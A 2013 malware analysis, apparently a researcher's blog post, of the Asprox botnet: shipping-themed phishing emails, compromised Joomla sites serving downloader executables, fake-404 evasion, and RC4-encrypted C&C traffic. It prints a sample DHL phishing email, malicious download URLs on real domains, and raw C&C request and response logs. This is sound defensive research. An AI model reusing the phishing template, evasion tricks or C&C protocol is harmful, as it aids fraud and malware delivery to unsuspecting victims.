It goes like this:
Email distributionPhishing emails in this campaign seems to be send mostly from some hacked web-servers.
Phishing emailPhishing email directs the victims to follow to so URL to "Get Shipment Info" / or to enter shipment number on "Tracking page"URL (DHL), to "Print Receipt" to receive your parcel (FedEx), "Download It" to use the flight ticket (American Airlines) or to display "Shipment Label" (UPS).
The latest (September/October 2013) templates pretend to be wedding invitations or voicemail from WhatsApp.
Downloader sitesPhishing email points to compromised websites to serve ZIP file with malicious executable = Asprox downloader. On the beginning of May 2013 these sites tend to be mainly compromised Joomla 1.5 servers. At the end of May we see it is quite a lot of websites hosted in US, not necesarily Joomla related. Asprox botnet or people behind it us probably several exploits to compromise various PHP websites.
Links from phishing emails lead to compromised websites to malicious PHP script. This PHP script proxies all the requests to another backend server (currently I know only about 1 IP in Russia (184.108.40.206), but there is definitely more such servers. In case of failure/suspicion/ request thresh-hold the PHP script reports fake "404 Not Found" error code.
Download zipfileVictim downloads the zip file from the site containing executable file for example "Delivery Information.exe" Executable file has got icon of wordfile to convince the victim to open/run it.
Execute the downloaderWhen victim executes the malware, it mimics like some benign things. Notepad is opened to show some bogus tracking information.
Malware mascarades as windows binary (svchost.exe) to run hidden and undetected on the background.
Exe file is removed and replaced with a TXT file.
Comand&Control center(s) - dozens of nginx proxiesMalware contacts in round robin list of C&C for commands and downloading other malware. List of IPs is hardcoded to the downloader binary.Updated list of C&C can be obtained from the C&C. Sites contacted are another farm of compromised webservers running the nginx server configured as a reverse proxy. All requests are proxied to a backend server of C&C.
Download other germsOther malware is then downloaded, executed and so on and so forth.
Another layers???... there is possibly more layers.
The malware generated in the WhatsApp phishing campaign do have got icon of a note a fool the victims that this is some sound file.
Interesting bitsThese bits make it interesting:
Scale- Group seems to be running this very same infrastructure for at least 1 year. New evasion features are being added through the time - like encrypting the requests. Current campaign is within 2 weeks using dozens of compromised Joomla servers to serve the downloader malware. It is using dozens of servers (mostly compromised webservers) to send a spam. And as of writing the backend C&C is active at least on 34 IP adresses at once. If you consider that they probably have got more to move on and use, once the current ones are closed, the scale is really like a small enterprise.
Evasion- malicious scripts on compromised download sites stop serving malware after some time and respond with fake HTTP 404 Not Found response, probably to encourage lamer Joomla admins to stay on the current vulnerable version, as it seems that the problem gone away by itself. Similar evasion techniques are implemented on the C&C sites.
Automation- new obfuscated malware binaries for downloader are generated at least twice a day. The binaries for FakeAV downloaded from the C&C are automatically generated each 6 minutes. This ensures that samples at the time of execution are not known to your antivirus. For AV companies it usually takes 1-3 days to make a signature and propagate it for download for the client and then another days since the victim bothers to update the antivirus signatures.
Cloud- availavility of cheap cloud services allows the "throw-away" C&C to be hosted anywhere - especially when the host is compromised server paid by somebody else :). It is surprising that the 1st and 2nd layer of C&Cs is not hosted on some bullet-proof hosting in China or Ukraine, but it is in countries like France, United Kingdom, USA, Netherlands or Germany.
Phishing EmailsSample DHL:
If the links are not working, please move message to "Inbox" folder.
26.04.2013 PACK STATION
DHL Ship Shipment Notification
On April 25, 2013 a shipment label was printed for delivery.
The shipment number of this package is 36085695.
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
Get Shipment Info
2) Enter the shipment number on tracking page:
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
This message was created by DHL Ship, a product of DHL, at the request
of the sender. No authentication of email address has been performed.
Deutsche Post DHL 2013 DHL International GmbH. All rights reserved.
Sample DHL Express:
Downloader sitesMajority the sites serving malicious downloader file in May campaign seems to be servers with Joomla 1.5.
Backed script serving the downloader is performing some limitations on the download of the malware:
- limit 4 downloads per IP - number seems to be shared across the botnet infrastructure, this limitation probably makes it low profile from services like Google Badware
- allow only certain User-Agents
- probably some other filtering (geoip?, language?)
$ curl http://www.into-focus.de/templates/system/onlines.php?get_info=4_36160170 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> </body></html>Looks like
You can compare it with some real "404 Not Found" message - find 10 differences :) :
404 Not Found
Not FoundThe requested URL was not found on this server.
$ curl http://www.into-focus.de/templates/system/onlines_not_existing_file_23232ndljn2l3d.phpWhich looks like:
404 Not Found
Not FoundThe requested URL /templates/system/onlines_not_existing_file_23232ndljn2l3d.php was not found on this server.
Apache Server at www.into-focus.de Port 80
The download sites are being reused at the same time for different phishing campaigns and they serve different malware binaries based on the type of the request.
|Request||Campaign||sample||Name of Exe|
|?ticket=||American Airlines||http://andiburns.de/img/get.php?ticket=ss00_323||Electronic Ticket.exe|
|?receipt=||FedEx||http://andiburns.de/img/get.php?receipt=ss00_323||Postal Receipt No00843412843.exe|
|?receipt_print=||FedEx||http://andiburns.de/img/get.php?receipt=ss00_323||Postal Receipt No00843412843.exe|
|?print=||FedEx||http://andiburns.de/img/get.php?receipt=ss00_323||Postal Receipt No00843412843.exe|
Sample of the PHP script can be found on this forum. It forwards the requests to some backend server with the information about the IP of the client connecting (take from proxy tags if possible).
Asprox DownloaderThe downloader encrypts the requests with RC4 (see more info on the analysis from Trendmicro). Encrypted request is passed to the second layer of C&C. IP addresses of the C&Cs is hardcoded to the downloader binary. This request contains MD5 hash as identification of the victim computer and contains some action.
Request gate for work/index.php?r=gate&id=44641684AA45961586718E5F8309ADD9&group=3004spm&debug=0
Id is MD5 hash identifying the victim machine. Gate responds with command to the downloader. So far I have seen 3 commands sent to downloader - rdl, run, idl. Accoriding the analysis from TrendMicro there is more commands. Gate is quite picky about the format of the request - probably to make it low-profile against the automated probes from the Anti-Malware sites. If you perform the request using ordinary browser or commands like wget, you will most likely obtain only HTTP 404 Not Found
rdl- run dll. According to TrendMicro the DLL is encrypted with RC4. After downloaded it is injected to the svchost.exe running the downloader and is executed.
GET http://220.127.116.11:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 18.104.22.168:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:17 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2
GET http://22.214.171.124:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 126.96.36.199:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 18:37:19 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84e
run- run executable - since 27-Apr-2013 till 22-05-2013 I hae seen only e3943d7369aa6add911aca18b3a507f4.exe, which is some rogue antivirus. Checking report on virustotal/threadexpert there are links also to other exe files. Since 23-May-2013 the C&Cs are serving a5347c1b5b4aa9bd13d76736eb57c67f.exe, 6b761f91b02f89f9e695d4b5a87806de.exe and b2f7e9141eb124ce3152352c5df520f7.exe. So far I do not know, what the hash filename stands for.
GET http://188.8.131.52:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 184.108.40.206:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:20 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2
idl- sleep 1 second
GET http://220.127.116.11:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 18.104.22.168:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:22 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=idl
Request Gate for the list of IPS/index.php?r=gate/getipslist&id=MACHINEKEY
Id in this case is not whole MACHINEID (MD5 identification of victim), but just first 8 chars from that. For example:
GET http://22.214.171.124:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D68D0315DA139940438195B2E568CDBBD2927A0A9262AF4E155C0D6692CDE0D117C0A5D5F907433B7E160F399D8227CF User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 126.96.36.199:8080Response is RC4 encrypted list of IPs of 3rd layer C&C to contact.
Comand&Control center(s)Current list of active C&C sites - updated 2013-07-11
Download other germsFiles are downloaded as exe (plain exe file to be executed) or as dll. The DLL have got extension crp and seem to have very high entropy, which means it is either compressed or encrypted. More analysis of the downloader is needer to determine what is happening with the dll files after downloading.
So far I have identified these files that can be downloaded:
This exe file seems to be FakeAV - some rogue Antivirus. Once it is executed it reports itself to some registration site in Hongkong: